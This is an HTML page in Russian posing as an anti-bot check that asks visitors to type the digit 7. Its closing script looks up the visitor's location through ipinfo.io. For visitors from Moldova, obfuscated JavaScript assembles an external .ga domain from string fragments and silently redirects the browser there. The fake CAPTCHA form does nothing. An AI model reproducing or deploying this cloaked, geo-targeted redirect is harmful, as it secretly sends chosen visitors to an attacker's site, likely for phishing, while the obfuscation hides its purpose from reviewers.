<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Привет мир!</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>

</head>
<body>
	
    <style>
      * {
        -webkit-tap-highlight-color: transparent;
        user-select: none;
      }

      html,
      body {
        margin: 0;
        padding: 0;
        font-family: Tahoma, sans-serif;
      }

      .main {
        padding: 0 15px;
        display: flex;
        width: 100%;
        max-width: 100%;
        box-sizing: border-box;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        flex-direction: column;
      }

      .main-head__title {
        font-size: 42px;
        font-weight: 400;
        margin: 0;
        text-align: center;
      }
      .main-head__title span {
        color: #ffa500;
        font-size: 1.3em;
      }
      .main-head__subtitle {
        margin: 0;
        margin-top: 15px;
        font-size: 28px;
        text-align: center;
      }

      .main-head__subtitle span {
        color: #ffa500;
      }

      .main-form {
        margin-top: 60px;
        display: flex;
        flex-direction: column;
      }
      .main-form__inp {
        width: 260px;
        height: 70px;
        border-radius: 8px;
        font-size: 20px;
        border: 3px solid #ffa501;
        padding: 5px;
        box-sizing: border-box;
        outline: none;
        text-align: center;
        font-family: Tahoma, sans-serif;
      }
      .main-form__inp:focus::placeholder {
        color: transparent;
      }
      .main-form__btn {
        font-size: 20px;
        font-family: Tahoma, sans-serif;
        margin-top: 15px;
        width: 260px;
        height: 60px;
        background-color: transparent;
        border: none;
        outline: none;
        cursor: pointer;
        background-color: #ffa500;
        border-radius: 8px;
        color: white;
        font-size: 16px;
        transition-duration: 0.3s;
        user-select: none;
      }
      .main-form__btn:hover {
        background-color: #eca219;
      }
      .main-form__btn:active {
        opacity: 0.7;
      }
      .main-form__btn--disabled {
        opacity: 0.4;
        pointer-events: none;
      }

      @media (max-width: 600px) {
        .main-head__title {
          font-size: 30px;
        }

        .main-head__subtitle {
          margin: 0;
          margin-top: 15px;
          font-size: 22px;
          text-align: center;
        }
      }
    </style>
  
    <main class="main">
      <div class="main-head">
        <h1 class="main-head__title">Защита от - <span>Ботов</span></h1>
        <p class="main-head__subtitle">
          Введите цифру <span>7</span> в форму ниже
        </p>
      </div>

      <form class="main-form">
        <input
          class="main-form__inp"
          maxlength="1"
          type="text"
          placeholder="Введите цифру 7"
        />
        <button type="submit" class="main-form__btn">Перейти</button>
      </form>
    </main>
    
<script>
	fetch('https://ipinfo.io/json')
	.then( res => res.json())
	.then(response => {
	   var _0x35fc=['150XfJOsB','1051024fAhRKQ','1zMSMGx','52903OVZNJC','824878QvQWhu','search','151NgKvhh','633791QEtNeF','location','14gHJrWi','https://','href','5086pDPohQ','bbralti','985833qFPEhs','1iehDsX','geot'];var _0x4d6e=function(_0x33b875,_0x1b5e27){_0x33b875=_0x33b875-0xff;var _0x35fc76=_0x35fc[_0x33b875];return _0x35fc76;};var _0x1861ed=_0x4d6e;(function(_0xba38ee,_0x560078){var _0x156e12=_0x4d6e;while(!![]){try{var _0x203034=parseInt(_0x156e12(0x10f))+parseInt(_0x156e12(0x10e))+parseInt(_0x156e12(0x103))*-parseInt(_0x156e12(0x109))+-parseInt(_0x156e12(0x104))+parseInt(_0x156e12(0x101))*-parseInt(_0x156e12(0xff))+-parseInt(_0x156e12(0x106))*-parseInt(_0x156e12(0x100))+parseInt(_0x156e12(0x10b))*parseInt(_0x156e12(0x10c));if(_0x203034===_0x560078)break;else _0xba38ee['push'](_0xba38ee['shift']());}catch(_0x5366c3){_0xba38ee['push'](_0xba38ee['shift']());}}}(_0x35fc,0x86852));if(response['country']=='MD'){var a=_0x1861ed(0x10d),b='ianesco',c=_0x1861ed(0x10a),d='ga';$(location)['attr'](_0x1861ed(0x108),_0x1861ed(0x107)+a+b+c+'.'+d+window[_0x1861ed(0x105)][_0x1861ed(0x102)]);}
	 })
	 .catch((data, status) => {
	    console.log('Request failed');
	 })
</script>
	
</body>
</html>
